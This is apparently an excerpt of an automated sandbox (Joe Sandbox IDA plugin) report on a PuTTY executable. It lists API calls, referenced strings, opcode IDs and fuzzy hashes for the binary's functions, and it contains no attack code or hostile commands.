                    • getpeername.WS2_32(?,?), ref: 00BE7062
                    • htons.WS2_32(?), ref: 00BE70C5
                    • inet_ntoa.WS2_32(?), ref: 00BE70D6
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                    • htons.WS2_32(?), ref: 00BE711F
                    • inet_ntop.WS2_32(00000017,?,?,00000041), ref: 00BE7135
                    Strings
                    Similarity
                    • API ID: htons$_strcat_strlengetpeernameinet_ntoainet_ntop
                    • String ID: %s:%d$[%s]:%d
                    • API String ID: 3000913097-2542140192
                    • Opcode ID: 0d67d03469cd1b1b6b386cf8b9606b404909e947a532380e879e6a9ea218c233
                    • Instruction ID: 96ee5611b8e471812720352beb97299f6d770ddbaf661094cc7d5fd536c88cb4
                    • Opcode Fuzzy Hash: 0d67d03469cd1b1b6b386cf8b9606b404909e947a532380e879e6a9ea218c233
                    • Instruction Fuzzy Hash: F1316FB15043409FE7209F65D845B6FBBF4EB88710F004A2DF99AC7291D775E944CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00BD8A8C
                    • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 00BD8AA7
                    • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00BD8AC2
                    Strings
                    Similarity
                    • API ID: AddressProc
                    • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                    • API String ID: 190572456-129414566
                    • Opcode ID: 3ef3cbac7f5779083763ba11ed0be7cba99dcb4e0beb7fe6731d15923ddc236d
                    • Instruction ID: 48a9b8e141ef735a6dfc182602695684c95e086077c191310ea07e943db1e797
                    • Opcode Fuzzy Hash: 3ef3cbac7f5779083763ba11ed0be7cba99dcb4e0beb7fe6731d15923ddc236d
                    • Instruction Fuzzy Hash: 2E214AB43417029BDB1A9F25ECAAF2EB7E5BB04706F00492EE407862A0EF71D804DB05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SendDlgItemMessageA.USER32(?,?,0000018A,?,00000000), ref: 00BD03AF
                    • SendDlgItemMessageA.USER32(?,?,00000189,?,00000000), ref: 00BD03CD
                    • SendDlgItemMessageA.USER32(?,?,00000199,?,00000000), ref: 00BD03D9
                    • SendDlgItemMessageA.USER32(?,?,00000185,00000000,?), ref: 00BD03E9
                    • SendDlgItemMessageA.USER32(?,?,00000182,?,00000000), ref: 00BD03F5
                    • SendDlgItemMessageA.USER32(?,?,00000181,?), ref: 00BD0406
                    • SendDlgItemMessageA.USER32(?,?,0000019A,?,00000000), ref: 00BD0414
                    • SendDlgItemMessageA.USER32(?,?,00000186,?,00000000), ref: 00BD0420
                    Similarity
                    • API ID: ItemMessageSend
                    • String ID:
                    • API String ID: 3015471070-0
                    • Opcode ID: 46754d9f81439e45afd278e1b37efd2c1718ca52c74d8bc30fa0a2568ead7575
                    • Instruction ID: a554d640a543bd7d8019bec36e457c7d63cc045bfc271078036a16d72a5c4ed8
                    • Opcode Fuzzy Hash: 46754d9f81439e45afd278e1b37efd2c1718ca52c74d8bc30fa0a2568ead7575
                    • Instruction Fuzzy Hash: 7401B5712817083BF12126129C46FAF7E6CDFC3F88F014118F744691C0DAA6AE02827A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Similarity
                    • API ID: LocalTime
                    • String ID: %H%M%S$&$&$&
                    • API String ID: 481472006-1342691861
                    • Opcode ID: 8ce91a63e2533703f7b46149fda59d11434a328bef3d071370d5993e9bc77cf8
                    • Instruction ID: d4a0a92bf3e5fc0cfcc0302921fa104b7f95cbed849997efc0f2745d2847ee14
                    • Opcode Fuzzy Hash: 8ce91a63e2533703f7b46149fda59d11434a328bef3d071370d5993e9bc77cf8
                    • Instruction Fuzzy Hash: 7F5106B6949344AFD710AB20AC8673BB7E4EB55704F4C49ABF89987382F331D9188753
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnterCriticalSection.KERNEL32(00CB33E0), ref: 00C161FA
                    • CloseHandle.KERNEL32(?), ref: 00C16223
                    • EnterCriticalSection.KERNEL32(00CB33E0), ref: 00C1622A
                    • LeaveCriticalSection.KERNEL32(00CB33E0), ref: 00C16249
                    • SetEvent.KERNEL32(?), ref: 00C162FD
                    • LeaveCriticalSection.KERNEL32(00CB33E0), ref: 00C163B4
                    Similarity
                    • API ID: CriticalSection$EnterLeave$CloseEventHandle
                    • String ID:
                    • API String ID: 1488367401-0
                    • Opcode ID: dce4a45660f8b2bd737aec653b450d7267ebf0f4ff8b736f92bf0aa6a3eb79ac
                    • Instruction ID: b3c7109b08a6dce2c7115ebc9f875c4adb577dbfb942d2a5294ef0dd624411e7
                    • Opcode Fuzzy Hash: dce4a45660f8b2bd737aec653b450d7267ebf0f4ff8b736f92bf0aa6a3eb79ac
                    • Instruction Fuzzy Hash: 23519470500290EFDB119F19DCC5BA97BA4EF06304F0880A8ED0A9F297D7B5E995DB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _strlen.LIBCMT ref: 00C3EAA6
                    • _strcat.LIBCMT ref: 00C3EADB
                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C3EB1A
                    Strings
                    Similarity
                    • API ID: AddressProc_strcat_strlen
                    • String ID: %02x$CryptProtectMemory$crypt32.dll
                    • API String ID: 3651457578-4241872374
                    • Opcode ID: 9bce28b33c68db5cfc35f71e58251911dd04fd4da741d01b28afc7c8e03caad5
                    • Instruction ID: 7859c62a136a3fde1e1f156326f00379ce9086aa8580d18c3dca1bc77a475120
                    • Opcode Fuzzy Hash: 9bce28b33c68db5cfc35f71e58251911dd04fd4da741d01b28afc7c8e03caad5
                    • Instruction Fuzzy Hash: 9231F4F19103406BDB1167356C8AF5B7BE89F41309F080564F80A9B282E622DA04C7A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 00C4EBD7
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00C4EBDF
                    • _ValidateLocalCookies.LIBCMT ref: 00C4EC68
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00C4EC93
                    • _ValidateLocalCookies.LIBCMT ref: 00C4ECE8
                    Strings
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: csm
                    • API String ID: 1170836740-1018135373
                    • Opcode ID: 501b0416d9e80f9375d988528259d1f116d1145bbbb0ba16ffffea7e8a690afc
                    • Instruction ID: 8dd1b002bfbbf7154c0e09628919c6e3d5d4b8518700f21728f05efd04972729
                    • Opcode Fuzzy Hash: 501b0416d9e80f9375d988528259d1f116d1145bbbb0ba16ffffea7e8a690afc
                    • Instruction Fuzzy Hash: AB41A234E002099FCF21EF69C8C5AAEBBB5FF45328F158155E8259B392D731AE01CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BEC620: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32EC), ref: 00BEC69D
                      • Part of subcall function 00BEC620: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32F0), ref: 00BEC6CC
                      • Part of subcall function 00BEC620: GetLastError.KERNEL32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32F0), ref: 00BEC6D6
                    • GetCurrentProcess.KERNEL32 ref: 00BEC832
                    • GetLastError.KERNEL32 ref: 00BEC86C
                    • LocalFree.KERNEL32(?), ref: 00BEC893
                    Strings
                    Similarity
                    • API ID: AllocateErrorInitializeLast$CurrentFreeLocalProcess
                    • String ID: Could not restrict process ACL: %s$Unable to set process ACL: %s$unable to construct ACL: %s
                    • API String ID: 4156538165-2118130043
                    • Opcode ID: c3a26507354c67ce29522b0a10a301bc14d72414f154151f34bfa9ab7d14d87f
                    • Instruction ID: 5f775051f969551d22e4046d8674e31933b5f05f3cd9750671e808f8f7f3ac6f
                    • Opcode Fuzzy Hash: c3a26507354c67ce29522b0a10a301bc14d72414f154151f34bfa9ab7d14d87f
                    • Instruction Fuzzy Hash: F5318DB0608341AFE710DF11D949B2FBFE8EB84B48F04495CF5899B391D3B69905CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateNamedPipeA.KERNEL32(?,40000003,00000008,000000FF,00001000,00001000,00000000), ref: 00C3F113
                    • ConnectNamedPipe.KERNEL32(?,00000010), ref: 00C3F12A
                    • GetLastError.KERNEL32 ref: 00C3F134
                    • CloseHandle.KERNEL32(?), ref: 00C3F176
                    Strings
                    • Error while listening to named pipe: %s, xrefs: 00C3F193
                    Similarity
                    • API ID: NamedPipe$CloseConnectCreateErrorHandleLast
                    • String ID: Error while listening to named pipe: %s
                    • API String ID: 3669627233-1472817922
                    • Opcode ID: f0fa0446c8e33bd906bed36271252604754ada083b84050c10d8def98e1ccf44
                    • Instruction ID: a8c588b862f121fd84097216c60f9c8f9a9c6eb0d5d02d42c18c41420540d54b
                    • Opcode Fuzzy Hash: f0fa0446c8e33bd906bed36271252604754ada083b84050c10d8def98e1ccf44
                    • Instruction Fuzzy Hash: 9631B670A10300AFE7246B25EC85F2F77E8EF88354F14493CF45BD7291D771A9418A52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ShowCursor.USER32(00000001), ref: 00BB268D
                    • GetCursorPos.USER32(?), ref: 00BB269F
                    • IsZoomed.USER32 ref: 00BB2712
                    • GetWindowLongA.USER32 ref: 00BB2724
                    • SendMessageA.USER32(?,00000112,0000F090,?), ref: 00BB275A
                    Strings
                    Similarity
                    • API ID: Cursor$LongMessageSendShowWindowZoomed
                    • String ID: (
                    • API String ID: 1399778751-3887548279
                    • Opcode ID: 7f72481688b73f7f1cf001e888694b55747d7d01afd53d24deac218bcbb9d805
                    • Instruction ID: aaef47830a5ef8914ece326c2acd2bd01dfda47133c094adacfd8ad171803870
                    • Opcode Fuzzy Hash: 7f72481688b73f7f1cf001e888694b55747d7d01afd53d24deac218bcbb9d805
                    • Instruction Fuzzy Hash: CA218D316183009FE715AB25ED99BFE77E0FB41304F58892CF686861A1DBB58C48EB16
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ShowCursor.USER32(00000001), ref: 00BB268D
                    • GetCursorPos.USER32(?), ref: 00BB269F
                    • IsZoomed.USER32 ref: 00BB2712
                    • GetWindowLongA.USER32 ref: 00BB2724
                    • SendMessageA.USER32(?,00000112,0000F090,?), ref: 00BB275A
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Cursor$LongMessageSendShowWindowZoomed
                    • String ID: (
                    • API String ID: 1399778751-3887548279
                    • Opcode ID: d61eaeed568a42ecc197bbdc1f381e59a3561979a986896ea5fc33d0a00d8668
                    • Instruction ID: 5f862d47f68e75f7bc674ee8aca222e27fb38a3761c378183afd0c32d8ed2a9c
                    • Opcode Fuzzy Hash: d61eaeed568a42ecc197bbdc1f381e59a3561979a986896ea5fc33d0a00d8668
                    • Instruction Fuzzy Hash: 7A21AD312082009FD715AB25EC85BFE77E0FB41304F58492CF586C61A1DBB5DC44EB16
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ShowCursor.USER32(00000001), ref: 00BB268D
                    • GetCursorPos.USER32(?), ref: 00BB269F
                    • IsZoomed.USER32 ref: 00BB2712
                    • GetWindowLongA.USER32 ref: 00BB2724
                    • SendMessageA.USER32(?,00000112,0000F090,?), ref: 00BB275A
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Cursor$LongMessageSendShowWindowZoomed
                    • String ID: (
                    • API String ID: 1399778751-3887548279
                    • Opcode ID: ce4e26d5d494d42941f1ad2782e06720bf9a76c25d6ab9cdd34e69737b76ade9
                    • Instruction ID: ed201b708b0fa4492453e0b5820c0321eb390af78557aa85b7ee178ddeeba916
                    • Opcode Fuzzy Hash: ce4e26d5d494d42941f1ad2782e06720bf9a76c25d6ab9cdd34e69737b76ade9
                    • Instruction Fuzzy Hash: A021AD312482009FE725AB25EC85BFE77E0FB41314F584A2CF587861E1DBB58C44EB16
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FreeLibrary.KERNEL32(00000000,?,00C62D06,?,?,?,00000000,?,?,00C6270A,00000021,FlsSetValue,00C8A8F8,00C8A900,?), ref: 00C62CBA
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 3664257935-537541572
                    • Opcode ID: 317337f88d521560cdb51465d258231b1389148e6a27c867795978e90afc444e
                    • Instruction ID: cae77c61675d40f1e94dea891cb1c62976c7fc44695a4666287ca4d6b790f512
                    • Opcode Fuzzy Hash: 317337f88d521560cdb51465d258231b1389148e6a27c867795978e90afc444e
                    • Instruction Fuzzy Hash: D121E731A01611BBEB319B259CC4B5E3BA8EF457A4F290210F923E7294D774EF00D6D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateMutexA.KERNEL32(?,00000000,?), ref: 00C3EC5F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?), ref: 00C3EC6E
                    • GetLastError.KERNEL32(?,00000000,?), ref: 00C3EC76
                      • Part of subcall function 00BECC90: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD1B
                      • Part of subcall function 00BECC90: _strlen.LIBCMT ref: 00BECD26
                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00C17C1B,00000000,?), ref: 00C3ECA1
                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00C17C1B,00000000,?), ref: 00C3ECB0
                      • Part of subcall function 00BEC480: LocalAlloc.KERNEL32(00000040,00000014,?,00000000,?), ref: 00BEC54D
                      • Part of subcall function 00BEC480: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?), ref: 00BEC55D
                      • Part of subcall function 00BEC480: SetSecurityDescriptorOwner.ADVAPI32(?,00000000,?,00000000,?), ref: 00BEC572
                      • Part of subcall function 00BEC480: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?), ref: 00BEC585
                    Strings
                    • CreateMutex("%s") failed: %s, xrefs: 00C3EC87
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: DescriptorLocalSecurity$Free$AllocCreateDaclErrorFormatInitializeLastMessageMutexObjectOwnerSingleWait_strlen
                    • String ID: CreateMutex("%s") failed: %s
                    • API String ID: 3757897666-2623464464
                    • Opcode ID: 8a3c05e63f9e1426d3abedbe0f4f3246e33b9f70d85a6d359ead3c32f3f64ea6
                    • Instruction ID: 7d3c3a5c7bf462e0881d7fee468000896318021734058e0ae35aed5f631c6b09
                    • Opcode Fuzzy Hash: 8a3c05e63f9e1426d3abedbe0f4f3246e33b9f70d85a6d359ead3c32f3f64ea6
                    • Instruction Fuzzy Hash: 7C216FB16043116FE710EF25DC49B6F7BE8EB85758F054918F856D7281D734D904CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DeleteMenu.USER32(00000040,00000000), ref: 00BB68C5
                    • InsertMenuA.USER32(00000030,00000000,00000040,&Restart Session), ref: 00BB68DE
                    • DeleteMenu.USER32(00000040,00000000), ref: 00BB68EA
                    • InsertMenuA.USER32(00000030,00000000,00000040,&Restart Session), ref: 00BB68FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Menu$DeleteInsert
                    • String ID: %s (inactive)$&Restart Session
                    • API String ID: 985044671-219138112
                    • Opcode ID: 46296d96e44be574ecce2910e14c42d2b60fa4f364c60692ef39783f628378dd
                    • Instruction ID: 970d67dec07bff2c5024b6fbc513e3702478706823035fe6a77eb7589b9884cf
                    • Opcode Fuzzy Hash: 46296d96e44be574ecce2910e14c42d2b60fa4f364c60692ef39783f628378dd
                    • Instruction Fuzzy Hash: BE2187B1740240BBE7106F65FC1AF8E3B98EB41705F580170FA09BB1E1DAB1A855CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CloseHandle.KERNEL32(?), ref: 00C1613E
                    • EnterCriticalSection.KERNEL32(00CB33E0), ref: 00C1614C
                    • LeaveCriticalSection.KERNEL32(00CB33E0), ref: 00C1616E
                    • SetEvent.KERNEL32(?), ref: 00C16188
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/handle-io.c, xrefs: 00C16105
                    • h && !h->u.g.moribund, xrefs: 00C1610A
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CriticalSection$CloseEnterEventHandleLeave
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/handle-io.c$h && !h->u.g.moribund
                    • API String ID: 1836394787-1076956789
                    • Opcode ID: da4a70214f3b7635f322be7fd828d21f8d35a686f987ec4a97b46309bb8f47a9
                    • Instruction ID: 504ca07c14c1717730226fe336d27d0823d6fec3e9ee86a74a1a095bda0355b4
                    • Opcode Fuzzy Hash: da4a70214f3b7635f322be7fd828d21f8d35a686f987ec4a97b46309bb8f47a9
                    • Instruction Fuzzy Hash: 44118C70500780ABD7358F65E808B9ABBF0FF46715F14886DE49743AA1C371B588DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadCursorA.USER32 ref: 00BB694A
                    • SetClassLongA.USER32(000000F4,00000000), ref: 00BB695B
                    • SetCursor.USER32(00000000), ref: 00BB6962
                    • ShowCursor.USER32(00000000), ref: 00BB6974
                    Strings
                    • false && "Bad busy_status", xrefs: 00BB698D
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c, xrefs: 00BB6988
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Cursor$ClassLoadLongShow
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c$false && "Bad busy_status"
                    • API String ID: 1160125251-1574196539
                    • Opcode ID: e3113db27e8147c04aa445eff64f12f329d4298bf304d66ff00d57ce1270fa15
                    • Instruction ID: 9cfe70e591606dc21334b5057b3f6cfb231ba1e41ccb2080ed92f2ee38611863
                    • Opcode Fuzzy Hash: e3113db27e8147c04aa445eff64f12f329d4298bf304d66ff00d57ce1270fa15
                    • Instruction Fuzzy Hash: F40126B0548312AFE7151B64AC6ABBE37C5E706359F580665F987D36A0CBB94C00C750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: df1590650640b88c1982b565c5ae7bb04dfb26c4a62b87a919a560cb13f8dc9f
                    • Instruction ID: 3532914c73a60ca8652929e9c308011c2ba718ebe60bcce42a12e0c8f6f2b03b
                    • Opcode Fuzzy Hash: df1590650640b88c1982b565c5ae7bb04dfb26c4a62b87a919a560cb13f8dc9f
                    • Instruction Fuzzy Hash: 8EB11670E002499FDB31CFA9C8C1BBDBBB1AF49304F148158E5A5AB392C7709E42DB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Char$ObjectSelectWidthWidth32
                    • String ID:
                    • API String ID: 4136774150-0
                    • Opcode ID: d2a93c9b5021aea5d7909be684e3ecebdf6ef6bb40a795980dde261338a8cb64
                    • Instruction ID: aea1b2b202936881ee57a780d61ed6f982118935b64c70b937c6d77a39bc881c
                    • Opcode Fuzzy Hash: d2a93c9b5021aea5d7909be684e3ecebdf6ef6bb40a795980dde261338a8cb64
                    • Instruction Fuzzy Hash: B231E7715480105FD7246B18DC99FFE3FE6EB85760F9C0266F802DB2B0CA69DC40E6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLastError.KERNEL32(?,?,00C62087,00C4EA03,00C4E689), ref: 00C6209E
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C620AC
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C620C5
                    • SetLastError.KERNEL32(00000000,00C62087,00C4EA03,00C4E689), ref: 00C62117
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: e9481e6fa8fd5c5c7f847b8795a454029ac7dfdb8d6d84042be22d91ad0d2281
                    • Instruction ID: fe490e1a6143564ab9c8bbf9ad43edd60b1864e9848ad95f84388758bbc89597
                    • Opcode Fuzzy Hash: e9481e6fa8fd5c5c7f847b8795a454029ac7dfdb8d6d84042be22d91ad0d2281
                    • Instruction Fuzzy Hash: A001443260DB16AEA6392779BCC575F2698EB037B5B30033EF621951E1EF528D41F244
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strspn
                    • String ID: 0123456789$SSH PRIVATE KEY FILE FORMAT 1.1
                    • API String ID: 3684824311-1194959283
                    • Opcode ID: c00f1d6e7d677d8f4aa9cd634b0ede2bf941998b823cb6bcd432eee52ef18c3f
                    • Instruction ID: b29fca477d717deca8b34f9aa847f510aacfaf49b79aa8795f23496f8b19bfc7
                    • Opcode Fuzzy Hash: c00f1d6e7d677d8f4aa9cd634b0ede2bf941998b823cb6bcd432eee52ef18c3f
                    • Instruction Fuzzy Hash: 5261C5F59043406BE710AF20DC4675F7BE4AF85708F14082CF8855A342E7B6DA58EB93
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___from_strstr_to_strchr.LIBCMT ref: 00BE31BD
